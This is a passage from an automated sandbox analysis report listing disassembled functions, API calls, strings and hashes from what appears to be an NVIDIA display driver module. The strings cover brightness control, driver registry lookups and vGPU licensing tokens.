                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1607d6a937147e7e1b80bd02ff7d78fa9cf5cd381c73dc21dcab5a9ebf674daf
                                                                    • Instruction ID: e41608f8fff05a37a065f5f734777abd0d6ddf0899ed658c5b95c4a332a596e8
                                                                    • Opcode Fuzzy Hash: 1607d6a937147e7e1b80bd02ff7d78fa9cf5cd381c73dc21dcab5a9ebf674daf
                                                                    • Instruction Fuzzy Hash: EA31A232E1F182A5F6A796298945A3D1142DF817D0E248D30C13E23999CF2EB46E8E2C
                                                                    Function 00007FF8A8CFB1E4 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 202COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FreeLocal$FileModule$AttributesConditionHandleInfoMaskNameVerifyVersion
                                                                    • String ID: .dll$.sys$DriverSupportModules$DriverSupportModulesWow$OpenGLDriverName$OpenGLDriverNameWow$SOFTWARE\Khronos\OpenCL\Vendors$SOFTWARE\Khronos\Vulkan\Drivers$UserModeDListDriverName$UserModeDListDriverNameWow$UserModeDriverName$UserModeDriverNameWow
                                                                    • API String ID: 4251772004-68925701
                                                                    • Opcode ID: 5facd72482b9692fd211f3f53cd0d7375e14e14c12192311e83283b28c1ef30b
                                                                    • Instruction ID: 484ccb29bb10cd691b0014cfb6c0f8b6744c3fface5c7ba66a3877980609a25f
                                                                    • Opcode Fuzzy Hash: 5facd72482b9692fd211f3f53cd0d7375e14e14c12192311e83283b28c1ef30b
                                                                    • Instruction Fuzzy Hash: 80915F31A0BB42A5FB94DB12A8402B963A8FF447D4F440135DE5D437A2EF7CE914CB28
                                                                    Function 00007FF8A8CFB514 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 247librarymemoryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB5C6
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB5F6
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB62F
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB679
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB6AE
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB6E3
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB7D5
                                                                      • Part of subcall function 00007FF8A8CFC064: SetLastError.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC070
                                                                      • Part of subcall function 00007FF8A8CFC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC07A
                                                                      • Part of subcall function 00007FF8A8CFC064: LocalAlloc.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC08C
                                                                      • Part of subcall function 00007FF8A8CFC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC09F
                                                                      • Part of subcall function 00007FF8A8CFC064: LocalFree.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC0B0
                                                                      • Part of subcall function 00007FF8A8DC9BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DC9BD5
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB8AC
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB8B5
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB8BE
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB8C7
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerSetConditionMask.KERNEL32 ref: 00007FF8A8CFABB0
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FF8A8CFABDE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Free$Alloc$AddressProc$DirectorySystem$ConditionErrorInfoLastMaskVerifyVersion_invalid_parameter_noinfo
                                                                    • String ID: D3DKMTEnumAdapters2$D3DKMTEnumAdapters3$D3DKMTQueryAdapterInfo$NVDA$\SystemRoot\system32\$gdi32.dll
                                                                    • API String ID: 3214156114-2155789793
                                                                    • Opcode ID: 22e39945014d94b2270b4a0f70d15bca20469d08c9405ea033ee936579d7970c
                                                                    • Instruction ID: adf8f8bc4c9e2d7b2b3df1015c882089a55a448f6da79408bbdaa81a4a940a08
                                                                    • Opcode Fuzzy Hash: 22e39945014d94b2270b4a0f70d15bca20469d08c9405ea033ee936579d7970c
                                                                    • Instruction Fuzzy Hash: 4AB14635B0AB42A6FB54DB61E8141B823A0FF54BC8F484035CA0E57B95EF7CE955C728
                                                                    Function 00007FF8A8D50FA4 Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 406COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: InitInit_thread_footerVariant
                                                                    • String ID: Interpolated dGPU brightness: $ACELOG: Current pwm brightness: $ACELOG: Failed to connect to WMI server, failed to init EC brightness$ACELOG: Failed to obtain the cycle length of PWM (%d)! Forcing 800 for now$ACELOG: failed to exec query Select * from WmiMonitorBrightnessMethods$Current OS Brightness : $CurrentBrightness$Nvidia::UXDriver::Core::WmiBrightnessControl::InitECBrightness$SELECT * FROM WmiMonitorBrightness$WQL$WmiBrightnessControl.cpp
                                                                    • API String ID: 3754537983-2271714606
                                                                    • Opcode ID: 628ef8c08381526d3b675341c41e32d6837972d95de2ef61624d152d86d8edaf
                                                                    • Instruction ID: 0625d69093cbecaa7b2940a299f8141201c4878212e11b737b8eaa91f0feeb36
                                                                    • Opcode Fuzzy Hash: 628ef8c08381526d3b675341c41e32d6837972d95de2ef61624d152d86d8edaf
                                                                    • Instruction Fuzzy Hash: BA126F72A0AB81A9EB10DF61E8402ED37B4FB457D8F401136EA9D17B69EF38D258C714
                                                                    Function 00007FF8A8D7DA10 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 212synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$FileInit_thread_footerMutexObjectReleaseSingleSizeWait_invalid_parameter_noinfo
                                                                    • String ID: Failed to get file handle (%s)$Failed to open file %s (%s)$GridCloudLicensingTrustedStorage.cpp$H$Insufficient buffer size to read file$_readBinaryFile$rb+
                                                                    • API String ID: 3430759221-4049378212
                                                                    • Opcode ID: 1324711effdba529c38c2d15827a069b4bc2013ae8a407df2989af7f25b28303
                                                                    • Instruction ID: b3a276dcba0e8a02790b5fc673c95de38fc5c803e577a5c9bafca53584e4f53d
                                                                    • Opcode Fuzzy Hash: 1324711effdba529c38c2d15827a069b4bc2013ae8a407df2989af7f25b28303
                                                                    • Instruction Fuzzy Hash: 1FA14E32A0AB42A5EB10DB60E4402EE77B4FB843D8F500236D69D43B69EF7CE559CB54
                                                                    Function 00007FF8A8CFB8FC Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 134COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFB91C
                                                                    • SetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBAC1
                                                                      • Part of subcall function 00007FF8A8CFB1E4: SetLastError.KERNEL32 ref: 00007FF8A8CFB229
                                                                      • Part of subcall function 00007FF8A8CFB1E4: GetModuleHandleW.KERNEL32 ref: 00007FF8A8CFB28F
                                                                      • Part of subcall function 00007FF8A8CFB1E4: GetModuleFileNameW.KERNEL32 ref: 00007FF8A8CFB2A8
                                                                      • Part of subcall function 00007FF8A8CFB1E4: GetFileAttributesW.KERNEL32 ref: 00007FF8A8CFB31E
                                                                      • Part of subcall function 00007FF8A8CFB1E4: LocalFree.KERNEL32 ref: 00007FF8A8CFB334
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFB9F3
                                                                      • Part of subcall function 00007FF8A8DC9BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DC9BD5
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA01
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA5C
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA6B
                                                                    • SetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA78
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA81
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA8C
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA95
                                                                    • SetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBAB1
                                                                      • Part of subcall function 00007FF8A8CFC064: SetLastError.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC070
                                                                      • Part of subcall function 00007FF8A8CFC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC07A
                                                                      • Part of subcall function 00007FF8A8CFC064: LocalAlloc.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC08C
                                                                      • Part of subcall function 00007FF8A8CFC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC09F
                                                                      • Part of subcall function 00007FF8A8CFC064: LocalFree.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC0B0
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBAA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$Local$Free$File$AttributesDirectoryModuleSystem$AllocHandleName_invalid_parameter_noinfo
                                                                    • String ID: \SystemRoot\system32\$system32\
                                                                    • API String ID: 2409060974-552109975
                                                                    • Opcode ID: 545285607237cb391dbd0e330b5cb997ee9b3b978d4aee174bfda1b9bdb13648
                                                                    • Instruction ID: 0a4013383546ce3b459d7b2767d22042b2b4c12456bdb68eaf0968ef27e11789
                                                                    • Opcode Fuzzy Hash: 545285607237cb391dbd0e330b5cb997ee9b3b978d4aee174bfda1b9bdb13648
                                                                    • Instruction Fuzzy Hash: 3B516820F0B742A5FF94AB62940117962A5EF44BC0F488035DA5E47B92EFACFD158B38
                                                                    Function 00007FF8A8D2FEC0 Relevance: 23.2, APIs: 2, Strings: 11, Instructions: 456registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDeallocateEventFromGuidsInstanceRegisterStringTracestd::_
                                                                    • String ID: APPID$Invalid serviceName received from container. Aborting...$NVSvc$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnInitialize$Plugin initialized successfully$Received OnInitialize() from NvContainer$Registering AppId for NvXDCoreModule$Registering server for NvXDCoreModule$service name from NvContainer is${C5EDFC9D-B018-41A4-9877-39AB18469C3A}
                                                                    • API String ID: 1968691844-2102066953
                                                                    • Opcode ID: 937d97db533433f06670ceecabd02b049a6581dd8fa8ec3cdb202777d278f3d8
                                                                    • Instruction ID: 8a24907457bb4ab767c1cec1fd7b1af2662fbbe92f0f50c1342528ee111523a3
                                                                    • Opcode Fuzzy Hash: 937d97db533433f06670ceecabd02b049a6581dd8fa8ec3cdb202777d278f3d8
                                                                    • Instruction Fuzzy Hash: BA321F36A06B81E9E721DF61E8402E933B8FB44798F500236DA5C07B69EF3CD658C358
                                                                    Function 00007FF8A8D2F48C Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 249stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Valuelstrcat
                                                                    • String ID: AuthToken$CacheAuthToken$Empty authentication token$NvXDCore.cpp$Reading authentication token$SOFTWARE\NVIDIA Corporation\Global\GridSW$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW$Unable to delete authentication token from registry$Unable to fetch authentication token from registry
                                                                    • API String ID: 3187036572-111034611
                                                                    • Opcode ID: 4f09136e7a493a28a2e01e564276c6568ee939a43db4d9e2981aec8bb4f40de8
                                                                    • Instruction ID: 945fcc54ee5e0bdfc4e8be175a9142c842aa45236c412ac6f4d0f761d1df893e
                                                                    • Opcode Fuzzy Hash: 4f09136e7a493a28a2e01e564276c6568ee939a43db4d9e2981aec8bb4f40de8
                                                                    • Instruction Fuzzy Hash: 92C12A32A0AB41A5E710DBA1E4400DEB7B8FB857D4F900236EA9D57B69EF3CD158CB14
                                                                    Function 00007FF8A8D73D70 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 223COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetEnvironmentVariableA.KERNEL32(00000013,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D73E0D
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D73E80
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D73F71
                                                                    • GetLastError.KERNEL32(?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D74064
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D74080
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$EnvironmentErrorLastVariable
                                                                    • String ID: Failed to get system drive path (%d)$GridCommonUtils.cpp$SystemDrive$Unable to fetch the client configuration token file$Unable to open directory (%s)$\Program Files\NVIDIA Corporation\vGPU Licensing\ClientConfigToken$isNLSTokenFilePresent
                                                                    • API String ID: 2327880762-3378230023
                                                                    • Opcode ID: 930d206374b0d49319ab198b474e61e325f5b57f13b5bcc518ce263285a9ec12
                                                                    • Instruction ID: 10aeca70a589334ed92680be4e2055ad4a2a5d7799f86959c20b11e1a810c9ad
                                                                    • Opcode Fuzzy Hash: 930d206374b0d49319ab198b474e61e325f5b57f13b5bcc518ce263285a9ec12
                                                                    • Instruction Fuzzy Hash: 64B15F32A0AB81E5FB119B64E4402DD77B4FB84398F900236E69D43BA9EF3CD559CB14
                                                                    Function 00007FF8A8DB8B30 Relevance: 21.2, APIs: 14, Instructions: 195COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle$Event$Create
                                                                    • String ID:
                                                                    • API String ID: 1549041071-0
                                                                    • Opcode ID: 1de0987bfbf78678eb48ce6fc79e8fd271becc109d311275e15a01aa1ebb116b
                                                                    • Instruction ID: f68f3fe2e5e6b7728dd14027a6ee600a4c5d8474c1f6340515cf87cf984f989b
                                                                    • Opcode Fuzzy Hash: 1de0987bfbf78678eb48ce6fc79e8fd271becc109d311275e15a01aa1ebb116b
                                                                    • Instruction Fuzzy Hash: 5071E572A4BA8299EE50EB35D40867CA354EB45BE0F094A31CE3D537D1CF3CE8588328
                                                                    Function 00007FF8A8D7E020 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 293COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
